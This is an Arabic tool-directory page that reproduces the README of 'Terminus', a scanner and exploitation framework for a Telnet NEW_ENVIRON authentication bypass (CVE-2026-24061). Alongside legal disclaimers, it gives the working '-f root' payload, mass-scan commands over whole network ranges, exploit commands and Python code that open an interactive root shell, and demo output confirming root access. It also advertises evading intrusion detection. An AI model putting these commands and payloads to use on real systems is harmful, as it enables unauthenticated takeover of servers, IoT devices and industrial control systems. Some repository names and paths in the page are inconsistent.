Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ridpath/terrminus-cve-2026-2406
تصعيد الامتيازاتالاستطلاعماسحات الثغرات الأمنيةأمان إنترنت الأشياءالاستغلالأمن SCADA/ICSجمع المعلوماتأمن الويبأمن الشبكات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
اختبار الاختراق
الفريق الأحمر
GitHubridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIO Scanner & Exploitation Framework لـ CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). يتضمن اكتشافًا عالي التزامن، وبصمة سلبية، وتصعيدًا مصرحًا لصدفة الجذر.

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

Terminus - إطار عمل الماسح والاستغلال لـ CVE-2026-24061

محرك تحليل أمني لثغرة تجاوز مصادقة Telnet NEW_ENVIRON وتصعيد الامتيازات CVE-2026-24061.

Terminus


نظرة عامة

Terminus هو أداة بحث أمني احترافية مصممة لاختبار الاختراق المصرح به وتقييم الثغرات لـ CVE-2026-24061. تؤثر هذه الثغرة الحرجة على تطبيقات خادم Telnet القديمة، مما يسمح للمهاجمين عن بُعد غير المصادقين بتجاوز المصادقة والحصول على وصول بمستوى الجذر.

ما هي CVE-2026-24061؟

CVE-2026-24061 هي ثغرة تنفيذ تعليمات برمجية عن بُعد في خدمات Telnet التي تدعم RFC 1572 (خيار بيئة Telnet). تستغل الثغرة عدم التعقيم السليم لمتغير البيئة USER أثناء تفاوض NEW_ENVIRON:

  • المصادقة العادية: USER=john → يطلب كلمة المرور
  • حمولة الاستغلال: USER=-f root → يتجاوز المصادقة، ويمنح قشرة جذر

التأثير:

  • تجاوز كامل للمصادقة (بدون الحاجة إلى كلمة مرور)
  • تصعيد فوري للامتيازات إلى الجذر
  • اختراق كامل للنظام

الخدمات المتأثرة:

  • GNU Inetutils telnetd القديم (تحديدًا الإصدارات حتى 2.7)
  • البرامج الثابتة لإنترنت الأشياء ذات تطبيقات Telnet الضعيفة
  • أنظمة التحكم الصناعية ذات خدمات Telnet القديمة

الميزات الرئيسية

ماسح الثغرات الشامل

  • مسح عالي التزامن: فحص أكثر من 1,000 هدف في وقت واحد باستخدام AsyncIO
  • دعم CIDR: فحص نطاقات شبكة كاملة (192.168.0.0/24, 10.0.0.0/8)
  • وضعا كشف مزدوجان:
    • سلبي (افتراضي): كشف سريع وآمن قائم على التوقيعات
    • تحقق نشط (--verify): إثبات الاستغلال، يؤكد وصول الجذر uid=0
  • تحليل اللافتات: بصمة أنواع الخوادم وإصداراتها
  • تسجيل المخاطر: تقييم ثقة متعدد الطبقات (حرج، عالي، متوسط، منخفض)

محرك بروتوكول متوافق مع RFC

  • فئة TerminusNegotiator: واجهة برمجة نظيفة لعمليات بروتوكول Telnet
    • Terminus.handshake() - مصافحة متوافقة مع RFC 854
    • Terminus.exploit() - تسليم حمولة CVE-2026-24061
  • تفاوض خيارات سليم: تجنب كشف IDS/IPS من خلال الامتثال للبروتوكول
  • آلة الحالة: معالجة قوية لتسلسلات IAC (DO/DONT/WILL/WONT/SB/SE)

استغلال مقيد بالتفويض

  • قشرة تفاعلية: قشرة كاملة بعد الاستغلال مع وصول الجذر
  • تنفيذ الأوامر: تنفيذ أوامر فردية والتقاط المخرجات
  • جمع الأدلة: جمع uid ومتغيرات البيئة ومعلومات النظام
  • آليات السلامة:
    • يتطلب علامة --exploit صريحة
    • معطل في وضع المسح الجماعي
    • تسجيل تدقيق لجميع محاولات الاستغلال

تقارير متعددة التنسيقات

  • الطرفية: جداول منسقة بألوان لمستويات المخاطر
  • JSON: تكامل SIEM/SOAR
  • CSV: تتبع عبر جداول البيانات
  • HTML: تقارير مفصلة مع إحصائيات
  • Markdown: مخرجات مناسبة للتوثيق

البنية

المحرك الأساسي: TerminusNegotiator

قلب Terminus هو فئة TerminusNegotiator، التي توفر فصلاً نظيفًا بين معالجة البروتوكول ومنطق الاستغلال:```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

root@kitploit:~
### نهج المحرك مقابل النصوص البرمجية

**النصوص البرمجية التقليدية** (الأدوات الحالية):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

محرك Terminus:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

root@kitploit:~
---

## التثبيت

### المتطلبات
- **بايثون 3.10+**
- **الأنظمة الأساسية المدعومة:**
  - ويندوز 10/11 (PowerShell)
  - ويندوز + WSL2 (كالي لينكس، باروت أو إس، أوبونتو)
  - لينكس أصلي (كالي، باروت، أوبونتو، دبيان)
  - ماك أو إس (مع بايثون 3.10+)

### بدء سريع (جميع الأنظمة الأساسية)

#### ويندوز (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS (Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

root@kitploit:~
#### التثبيت اليدوي (جميع المنصات)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

التبعيات (متعددة المنصات)

  • telnetlib3 - تنفيذ بروتوكول Telnet باستخدام AsyncIO
  • rich - واجهة المستخدم الطرفية والتنسيق (دعم ANSI على Windows/Linux)
  • pydantic - التحقق من البيانات والنماذج
  • aiofiles - الإدخال/الإخراج غير المتزامن للملفات
  • jinja2 - قوالب التقارير
  • pyyaml - إدارة التكوين
  • pathlib - معالجة المسارات عبر المنصات (مدمج)

ملاحظة: جميع التبعيات هي Python خالصة أو تحتوي على حزم جاهزة متعددة المنصات. لا حاجة إلى تجميع خاص بالمنصة.


إكمال الأوامر (اختياري)

فعّل إكمال الأوامر بضغطة Tab لإدخال أسرع للأوامر:

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

root@kitploit:~
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

Fish```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

root@kitploit:~
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

اختبره:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

root@kitploit:~
---

## الاستخدام

### أوضاع الفحص

#### فحص هدف واحد```bash
terminus scan -t 192.168.1.100

فحص نطاق CIDR```bash

terminus scan -t 192.168.1.0/24

root@kitploit:~
#### الفحص الجماعي القائم على الملفات```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

فحص الشبكة عالي التزامن```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

root@kitploit:~
### أوضاع الكشف

#### الكشف السلبي (الافتراضي - آمن)```bash
terminus scan -t target.com --passive-only

الكشف العدواني (جميع الاستدلالات)```bash

terminus scan -t target.com --aggressive

root@kitploit:~
#### وضع التحقق النشط (إثبات الاستغلال)```bash
terminus scan -t 192.168.1.100 --verify

الاستخدام

عرض توضيحي مباشر

التحقق من الإصدار:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

root@kitploit:~
**الفحص السلبي (الافتراضي - تقييم مخاطر متحفظ):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Parsing 1 targets...
Found 1 valid targets

  Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00

╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│   Critical: 0            │
│   High: 0                │
│   Medium: 0              │
│   Low: 1                 │
│   Info: 0                │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯

                                 Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │  Status   │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │     YES     │    -     │       3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

No vulnerable targets found

التحقق النشط باستخدام --verify (إثبات الاستغلال):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify

================================================================ TERMINUS CVE-2026-24061 Scanner & Exploitation Framework

Parsing 1 targets... Found 1 valid targets

Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00

╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯

root@kitploit:~
                               Terminus - CVE-2026-24061 Scan Results

╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

Found 1 vulnerable targets!

root@kitploit:~
**الاستغلال التفاعلي:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Attempting exploitation of 172.17.45.122:2323...
Payload: -f root

CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained

[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit

whoami
root
┌──[root@parrot]─[~]
└──╼ #

ملاحظات رئيسية:

  • الوضع السلبي: تم اكتشاف دعم NEW_ENVIRON لكن تم الإبلاغ عن مخاطر منخفضة (تحفظي)
  • التحقق النشط: تم تأكيد وصول الجذر (uid=0)، وتم رفع المخاطر إلى حرجة مع حالة تحقق "ROOT"
  • الاستغلال: قشرة جذر فورية دون مطالبة بكلمة مرور

ما الذي يفعله:

  • يقوم بالكشف السلبي أولاً (اللافتة + تحليل البروتوكول)
  • إذا اشتبه في وجود ثغرة، يحاول الاستغلال الفعلي باستخدام حمولة -f root
  • يؤكد وصول الجذر عن طريق التحقق من uid=0 في الاستجابة
  • يرفع المخاطر إلى حرجة عند تأكيد وصول الجذر
  • يخرج حالة التحقق في نتائج الفحص

حالات الاستخدام:

  • تحقق عالي الثقة لتقارير الامتثال
  • عروض إثبات المفهوم
  • تأكيد قابلية الاستغلال قبل الإبلاغ للبائعين
  • عمليات الفريق الأحمر التي تتطلب جمع الأدلة

مثال على المخرجات:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A

root@kitploit:~
**التحقق الدفعي:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json

ملاحظة: التحقق النشط يستغل الثغرات. استخدمه فقط مع التصريح المناسب.

تنسيقات الإخراج

إخراج JSON```bash

terminus scan -t 192.168.1.0/24 -o json > results.json

root@kitploit:~
#### تقرير HTML```bash
terminus scan -f targets.txt -o html -w report.html

تصدير CSV```bash

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv

root@kitploit:~
### الاستغلال (للاستخدام المصرح به فقط)

#### الصدفة التفاعلية```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

تنفيذ الأوامر```bash

terminus exploit -t 192.168.1.100 -c "id"

Output: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
#### حمولة مخصصة```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"

أوامر الأدوات المساعدة

تحديث توقيعات الثغرات الأمنية```bash

terminus update-signatures

root@kitploit:~
#### التحقق من النتائج السابقة```bash
terminus verify -f results.json

إظهار الإصدار والتوقيعات```bash

terminus version

root@kitploit:~
---

## إعداد بيئة الاختبار

### للفريق الأحمر: النشر عبر المنصات

**تم تصميم Terminus للنشر المحمول** - انسخ الدليل إلى أي نظام Windows/Linux وقم بتشغيله دون تثبيت:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml

بيئة اختبار WSL2 (ويندوز)

موصى بها لمحطات عمل الفريق الأحمر على ويندوز - بيئة لينكس معزولة لنشر خدمات الاختبار الضعيفة:

تثبيت WSL2 مع Kali أو Parrot```powershell

Windows PowerShell (Admin)

Install WSL2

wsl --install

Install Kali Linux

wsl --install -d kali-linux

OR Install Parrot OS (if available)

wsl --install -d ParrotOS

Verify

wsl -l -v

root@kitploit:~
#### داخل WSL2 (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate

نشر خدمة اختبار قابلة للاستغلال (WSL2 فقط)

تحذير: فقط في بيئات المختبر المعزولة. لا تنشر أبدًا على أنظمة الإنتاج.```bash

Inside WSL2

Install vulnerable netkit-telnetd version

sudo apt install netkit-telnetd=0.17-*

Configure for NEW_ENVIRON support

Edit /etc/inetd.conf to enable telnet

Start service

sudo systemctl restart inetd

Test from Windows host

From PowerShell:

terminus scan -t $(wsl hostname -I)

root@kitploit:~
### مصفوفة الاختبار عبر المنصات

اختبر Terminus على جميع المنصات التي يستخدمها فريق الاختراق الأحمر الخاص بك:

| المنصة | التثبيت | الفحص | الاستغلال |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | نعم | نعم | نعم |
| WSL2 - Kali Linux | نعم | نعم | نعم |
| WSL2 - Parrot OS | نعم | نعم | نعم |
| WSL2 - Ubuntu | نعم | نعم | نعم |
| Native Kali Linux | نعم | نعم | نعم |
| Native Parrot OS | نعم | نعم | نعم |
| macOS | نعم | نعم | نعم |

---

## مرجع API

### التكامل مع Python```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore

async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f"   Daemon: {result.daemon_type} {result.version}")
                print(f"   Confidence: {result.vulnerability_confidence:.2%}")

async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()
    
    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return
    
    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print(f"Root access obtained")
        print(f"Evidence: {result.evidence}")

# Run
asyncio.run(scan_network())

الأمان والأخلاقيات

تحذير قانوني

هذه الأداة مخصصة فقط من أجل:

  • مهام اختبار الاختراق المصرح بها
  • البحث الأمني في بيئات خاضعة للتحكم
  • مسابقات CTF والمختبرات التعليمية
  • تقييمات الأمن الدفاعي بإذن كتابي

الاستخدام غير المصرح به غير قانوني وغير أخلاقي.

آليات السلامة

  1. التفويض مطلوب: يتطلب الاستغلال علامة --exploit الصريحة
  2. مطالبات التأكيد: تأكيد تفاعلي قبل الاستغلال
  3. تسجيل التدقيق: جميع محاولات الاستغلال تُسجل مع الطوابع الزمنية
  4. فرض الهدف الواحد: تعطيل الاستغلال في وضع الفحص الجماعي
  5. تحديد المعدل: يمنع DoS العرضي أثناء الفحص

الإفصاح المسؤول

إذا اكتشفت أنظمة ضعيفة باستخدام Terminus:

  1. لا تستغل الأنظمة دون تفويض كتابي
  2. أبلغ مالكي الأنظمة بالنتائج من خلال الإفصاح المسؤول
  3. وثّق النتائج باستخدام ميزات إعداد التقارير في Terminus
  4. اتبع إرشادات الإفصاح المنسق عن الثغرات

المراجع

معلومات CVE

  • معرف CVE: CVE-2026-24061
  • الخطورة: حرجة (CVSS 9.8)
  • المتجه: شبكة، بدون مصادقة، تعقيد منخفض

البحث والتنفيذ

  • البحث الأساسي: SafeBreach-Labs CVE-2026-24061
  • استغلال مرجعي: telnet_rce.py
  • الماسح الجماعي: TryA9ain CVE-2026-24061

معايير البروتوكول

  • RFC 854: مواصفات بروتوكول Telnet
  • RFC 1572: خيار بيئة Telnet

الاختبار والتحقق

تغطية الاختبار

  • تغطية كود 90%+ مع pytest
  • اختبارات الوحدة لجميع الوحدات الأساسية
  • اختبارات التكامل مع خادم Telnet وهمي
  • معايير الأداء (1,000 هدف < 60 ثانية)

قائمة التحقق اليدوي للاختبار

  • فحص الخدمة الضعيفة (تحقق من الاكتشاف)
  • فحص الخدمة المصححة (تحقق من عدم وجود إيجابية كاذبة)
  • اختبار تجاوز المصادقة (بدون موجه كلمة مرور)
  • التحقق من تصعيد الامتيازات (uid=0)
  • مراقبة تنبيهات IDS (تحقق من التخفي)
  • اختبار الأداء (1,000+ هدف)

الإعداد

config.yaml (متعدد المنصات)

جميع المسارات نسبية لجذر المشروع - تعمل على Windows وLinux وWSL دون تعديل:```yaml

config.yaml - Cross-platform configuration

All paths relative to project directory

scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second

detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true

Signature database (relative path)

signatures_db: "./signatures.db"

exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true

reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"

Output directory (relative path - works on Windows/Linux)

output_dir: "./reports"

logging: level: "INFO"

Log file (relative path - automatic directory creation)

file: "./logs/terminus.log" format: "json" console_enabled: true


Acknowledgments

  • SafeBreach Labs: Original CVE-2026-24061 research and exploit implementation
  • TryA9ain: Batch scanning approach inspiration
  • RFC Authors: Telnet protocol specifications

تنزيل الأداة